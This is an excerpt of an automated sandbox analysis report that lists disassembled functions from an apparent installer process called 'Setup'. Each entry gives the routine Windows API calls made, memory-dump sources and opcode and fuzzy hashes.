                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C95131C
                                                                • Part of subcall function 6C9536BA: GetUserDefaultUILanguage.KERNEL32(02642228,?,00000000,?,?,?,?,6C951338,?,00000010,6C925A14,?,?,?,0000004C,6C95B498), ref: 6C9536D8
                                                              • _free.LIBCMT ref: 6C95137B
                                                                • Part of subcall function 6C95374B: __EH_prolog3.LIBCMT ref: 6C953752
                                                                • Part of subcall function 6C95374B: PathFileExistsW.SHLWAPI(?,SetupResources.dll,00000000,00000738,00000000,6C94FA6E,0000000C,6C953A05,?,6C90A794,?), ref: 6C9537B7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$DefaultExistsFileLanguagePathUser_free
                                                              • String ID:
                                                              • API String ID: 2326855983-0
                                                              • Opcode ID: 3cd309043fbb4a4c78c5e061a246c8e156448f5cc9cee5f7ff11823de8a1a897
                                                              • Instruction ID: da7196e269061347ab4fcdf6fc432ba31e810d5fbe505ee689262aa9b624de48
                                                              • Opcode Fuzzy Hash: 3cd309043fbb4a4c78c5e061a246c8e156448f5cc9cee5f7ff11823de8a1a897
                                                              • Instruction Fuzzy Hash: 26115BB0C0222A9BCF11DFA4C8915EEBB78AF25704F904456D96077F41C734D526CBE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C49F35E Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C49F365
                                                              • __recalloc.LIBCMT ref: 6C49F3A7
                                                                • Part of subcall function 6C4A83ED: __CxxThrowException@8.LIBCMT ref: 6C4A83E2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw__recalloc
                                                              • String ID:
                                                              • API String ID: 2968967773-0
                                                              • Opcode ID: 80dd588798020f8ffef7fc35b13d3e42abcff462048db3475b94b691a88d0064
                                                              • Instruction ID: c6f9eae53930766fd2267f31311845ed522fa9587a57f84ab921191129168167
                                                              • Opcode Fuzzy Hash: 80dd588798020f8ffef7fc35b13d3e42abcff462048db3475b94b691a88d0064
                                                              • Instruction Fuzzy Hash: 680161311016518BE330CF69C484F5ABBE6EF9170DBA4491CE5A59BF44EB79E806C780
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C968BDC Relevance: 3.1, APIs: 2, Instructions: 51COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: _memmove_s
                                                              • String ID:
                                                              • API String ID: 800865076-0
                                                              • Opcode ID: 052af3e1cd63b7b32d93e05f0403934d3c10a9d179138d7e1437bd8bf0c64c07
                                                              • Instruction ID: 2d91ab2c625d50a17138981422eaad61c98362726b142cf63db50b50de585af0
                                                              • Opcode Fuzzy Hash: 052af3e1cd63b7b32d93e05f0403934d3c10a9d179138d7e1437bd8bf0c64c07
                                                              • Instruction Fuzzy Hash: B101B5B1600004AFA70CDF6ACC65CAEB36DDFB6248714012EE50587B80EF71ED05C7A8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C953ACC Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C953AD3
                                                              • _memcpy_s.LIBCMT ref: 6C953B17
                                                                • Part of subcall function 6C968AFC: _wcsnlen.LIBCMT ref: 6C968B0C
                                                                • Part of subcall function 6C94FF21: _wcsnlen.LIBCMT ref: 6C94FF54
                                                                • Part of subcall function 6C94FF21: _memcpy_s.LIBCMT ref: 6C94FF8A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: _memcpy_s_wcsnlen$H_prolog3
                                                              • String ID:
                                                              • API String ID: 301610209-0
                                                              • Opcode ID: 1d699263b0f9701af5502d64e69b90807ed0a8f4f329409171f9072ec2000a5d
                                                              • Instruction ID: 78c387da0a186257554c12cfe46f70db67b0f933d5653f0b2190f009d60c3aca
                                                              • Opcode Fuzzy Hash: 1d699263b0f9701af5502d64e69b90807ed0a8f4f329409171f9072ec2000a5d
                                                              • Instruction Fuzzy Hash: FD017C7111020A9FDB04DFA4C881EDE7369FF24304B448916E9019BB51DB35EE29CBB5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C96847A Relevance: 3.0, APIs: 2, Instructions: 38registryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNEL32(00000000,00000034,00000000,00000001,00000000,00000000,00000034,?,?,6C92463B,00000034,00000034,00000000), ref: 6C9684A9
                                                              • RegCloseKey.ADVAPI32(?,?,?,6C92463B,00000034,00000034,00000000), ref: 6C9684BA
                                                                • Part of subcall function 6C968414: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,6C96849F,00000000,00000034,00000001,00000000,00000000,00000034,?,?,6C92463B,00000034,00000034,00000000), ref: 6C968425
                                                                • Part of subcall function 6C968414: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6C968435
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AddressCloseHandleModuleOpenProc
                                                              • String ID:
                                                              • API String ID: 823179699-0
                                                              • Opcode ID: 8cc90003c8128dbcf676de9480980ff97b700cd8d5998704e9b96568e0c9f30f
                                                              • Instruction ID: dd407ad7d9c39be027bc0c9e71b505393bdbe816493c92bfb7d6b61fa2e74394
                                                              • Opcode Fuzzy Hash: 8cc90003c8128dbcf676de9480980ff97b700cd8d5998704e9b96568e0c9f30f
                                                              • Instruction Fuzzy Hash: 78F06272101205FFEB198F45DC40F9AB77DFF41759F108126F9159A980C771DA10DB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C49DFAB Relevance: 3.0, APIs: 2, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetLastError.KERNEL32(0000000E,00000000), ref: 6C49DFD6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: d0c878f6074e453c76bd47a42a17e6c17adf3f074d1746f9c2c60b42a4bce0b3
                                                              • Instruction ID: c77b3cf94846d1fec601b8fb0fd0ef3fbbc63498edf48e435b1121b7b31f029e
                                                              • Opcode Fuzzy Hash: d0c878f6074e453c76bd47a42a17e6c17adf3f074d1746f9c2c60b42a4bce0b3
                                                              • Instruction Fuzzy Hash: 0CF0E9323443206FD710D669DC89F4677BCAB46729F444526F615FB981C7A0E801C294
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C94B17C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: __recalloc
                                                              • String ID:
                                                              • API String ID: 492097735-0
                                                              • Opcode ID: 9fad07f04a2b3a0acf749a7f8c51c01a16ae848ac707a0ba0f52564536c0b0b1
                                                              • Instruction ID: 515d6b8226ac5c0e0380769a5d4facf8d292f452a6a8cc606a8116599ada7155
                                                              • Opcode Fuzzy Hash: 9fad07f04a2b3a0acf749a7f8c51c01a16ae848ac707a0ba0f52564536c0b0b1
                                                              • Instruction Fuzzy Hash: 91F05EB1640200AFEF019E65CCC0A65BBB8EF29254B04C060FE1CCE64AF631CD14D7A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C94FFA8 Relevance: 3.0, APIs: 2, Instructions: 35COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: _memcpy_s
                                                              • String ID:
                                                              • API String ID: 2001391462-0
                                                              • Opcode ID: fe5dc39283643cf855e32fa90a050dbc95af31c6f7c3c4c905a391bb1e7ae606
                                                              • Instruction ID: 30644ac1653de990b0dc73db38a420d77cbd31589fdb4231dc1361ce3935a3d3
                                                              • Opcode Fuzzy Hash: fe5dc39283643cf855e32fa90a050dbc95af31c6f7c3c4c905a391bb1e7ae606
                                                              • Instruction Fuzzy Hash: 7AF03A72800158BB9F208F96CC48DCF7FBDEFA6254B154056FD04A7600E670EA45CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95D739 Relevance: 3.0, APIs: 2, Instructions: 27windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 6C95D747
                                                                • Part of subcall function 6C95FC46: __EH_prolog3.LIBCMT ref: 6C95FC4D
                                                                • Part of subcall function 6C95FC46: GetLastError.KERNEL32(?,?,?,6C95CE79,00000000,6C95BCC4,?,80070057,?,InvalidArguments,?,00000000,?,ParameterInfo.xml,?,?), ref: 6C95FC73
                                                              • PostMessageW.USER32(?,00000012,00000000,00000000), ref: 6C95D768
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CountErrorH_prolog3LastMessagePostTick
                                                              • String ID:
                                                              • API String ID: 1936365967-0
                                                              • Opcode ID: 1e2065bb8802716a6856e2960fc3d545d9ebecfe691535b724061060bc817443
                                                              • Instruction ID: e7373984a95f1f66b7a301413b9c9b3c150b72cd3bf34fb40b469eef32ae80a9
                                                              • Opcode Fuzzy Hash: 1e2065bb8802716a6856e2960fc3d545d9ebecfe691535b724061060bc817443
                                                              • Instruction Fuzzy Hash: 4AE092F76026467FDB048E6188C4C26B76CFB4426D7604139F51083E00C730DC60CBD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4A6041 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4A6048
                                                              • GetCommandLineW.KERNEL32(0000001C,6C4930C2,?), ref: 6C4A604D
                                                                • Part of subcall function 6C48BE03: __EH_prolog3.LIBCMT ref: 6C48BE0A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CommandLine
                                                              • String ID:
                                                              • API String ID: 1384747822-0
                                                              • Opcode ID: eee7443b4d2656638a12a24b505f386ea077948c039e223956d8d6b066480dcd
                                                              • Instruction ID: bf8867666831ae7bcf1ac4788c5b9eb6fd164c31664fce3b2b5118b69c525fe8
                                                              • Opcode Fuzzy Hash: eee7443b4d2656638a12a24b505f386ea077948c039e223956d8d6b066480dcd
                                                              • Instruction Fuzzy Hash: AEF058729400098BCB04EBA8C844FEDB774AF2432CF080119E211BBAC0DB34998ACBE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4911BA Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 6C4911D8
                                                              • FlushFileBuffers.KERNEL32(?), ref: 6C4911EA
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$BuffersFlushWrite
                                                              • String ID:
                                                              • API String ID: 1012034594-0
                                                              • Opcode ID: d88747a063ea1a44054baf23f18562f35e00cb218151e3e39fc08bf42f4ad777
                                                              • Instruction ID: 861498076292fcd32bf60f6a17c48060c189eecabe4300e3f80d06feed8bfbad
                                                              • Opcode Fuzzy Hash: d88747a063ea1a44054baf23f18562f35e00cb218151e3e39fc08bf42f4ad777
                                                              • Instruction Fuzzy Hash: 4CE06D36204256ABEB11DEA6CC05F8A3BBCAF0A755B04412AF924C1A14E730E9119A90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4A29EF Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4A29F6
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C48D923: __EH_prolog3.LIBCMT ref: 6C48D92A
                                                                • Part of subcall function 6C48D923: PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48D960
                                                                • Part of subcall function 6C48D923: GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48D9BA
                                                                • Part of subcall function 6C48D923: PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48DA0D
                                                              • SysFreeString.OLEAUT32(00000000), ref: 6C4A2A33
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Path$CombineFileFreeModuleNameRelativeString
                                                              • String ID:
                                                              • API String ID: 2530041087-0
                                                              • Opcode ID: c0ef6a2a6ddb7f9f44dde937f697cd80f483c5c7c924b492fb18109f80268a02
                                                              • Instruction ID: 056b4e70b1ead2f35ea7a6e8e0f459ee956a35e6d43515f8f2ce90c3989335c6
                                                              • Opcode Fuzzy Hash: c0ef6a2a6ddb7f9f44dde937f697cd80f483c5c7c924b492fb18109f80268a02
                                                              • Instruction Fuzzy Hash: 83F01C7191121AABDF00DFA0CC08EEE7BB8FF14349F40841DF414B6650CB31CA199BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C943AE6 Relevance: 3.0, APIs: 2, Instructions: 25COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • UnloadUserProfile.USERENV(6C943AE6,6C90BF34,?,6C944ABC,6C90A590,10000000,6C90A590,80000000,6C90A590,10000000,6C90A5D8,6C90A54C), ref: 6C943AFB
                                                              • FindCloseChangeNotification.KERNEL32(6C943AE6,?,6C944ABC,6C90A590,10000000,6C90A590,80000000,6C90A590,10000000,6C90A5D8,6C90A54C), ref: 6C943B0D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotificationProfileUnloadUser
                                                              • String ID:
                                                              • API String ID: 122385185-0
                                                              • Opcode ID: 3ff8e67c2084ae2540ef194e1ca6198eb8b66dbf68df515637433619284ec369
                                                              • Instruction ID: b50ac95774e96825231d90ade7a9f8e3867cae9747e917e50dc60d98ccc9ef38
                                                              • Opcode Fuzzy Hash: 3ff8e67c2084ae2540ef194e1ca6198eb8b66dbf68df515637433619284ec369
                                                              • Instruction Fuzzy Hash: 6EE039712117019BEB348B22E849F2377ECAF4062AF20C81CA4BA83940DB74E800CA54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9595AC Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9595B3
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • SysFreeString.OLEAUT32(?), ref: 6C9595E0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$FreeString
                                                              • String ID:
                                                              • API String ID: 2872891630-0
                                                              • Opcode ID: 1b25f17d9dbfd6c8fb354e7b2e3b9ee983c40c17b1f11ea2002db1359bf315f8
                                                              • Instruction ID: b83848150f9f4fec6d7cbd78d23c06c84c174275c737cbde2096943ba613064c
                                                              • Opcode Fuzzy Hash: 1b25f17d9dbfd6c8fb354e7b2e3b9ee983c40c17b1f11ea2002db1359bf315f8
                                                              • Instruction Fuzzy Hash: FFF0A570A0111AAFCF44DFA8C944AAEBBB1BF68304B008869E515DB620D771D915DB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C93516F Relevance: 3.0, APIs: 2, Instructions: 19libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,6C9350F8,00000000,0000000C,6C936E7F,00000000,?), ref: 6C93517C
                                                              • LoadLibraryW.KERNEL32(?,?,?,6C9350F8,00000000,0000000C,6C936E7F,00000000,?), ref: 6C935194
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Library$FreeLoad
                                                              • String ID:
                                                              • API String ID: 534179979-0
                                                              • Opcode ID: 141499392cdd79b69145b45c4a840e790ff95e4edd2b24eb6d440830e777c61e
                                                              • Instruction ID: 2cded659e719cc62deda5393958d6979268adf868bc356346769288ce9b8cc84
                                                              • Opcode Fuzzy Hash: 141499392cdd79b69145b45c4a840e790ff95e4edd2b24eb6d440830e777c61e
                                                              • Instruction Fuzzy Hash: FAE08C7A2007049BD7318F95D408A47BBFCEB95B45B00C429E92AC3900DB31F851CA90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C944029 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FlushFileBuffers.KERNEL32(?,?,6C952CF3), ref: 6C944035
                                                              • FindCloseChangeNotification.KERNEL32(?), ref: 6C94404C
                                                                • Part of subcall function 6C9689C8: GetLastError.KERNEL32(6C9180E8,6C91A9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 6C9689C8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
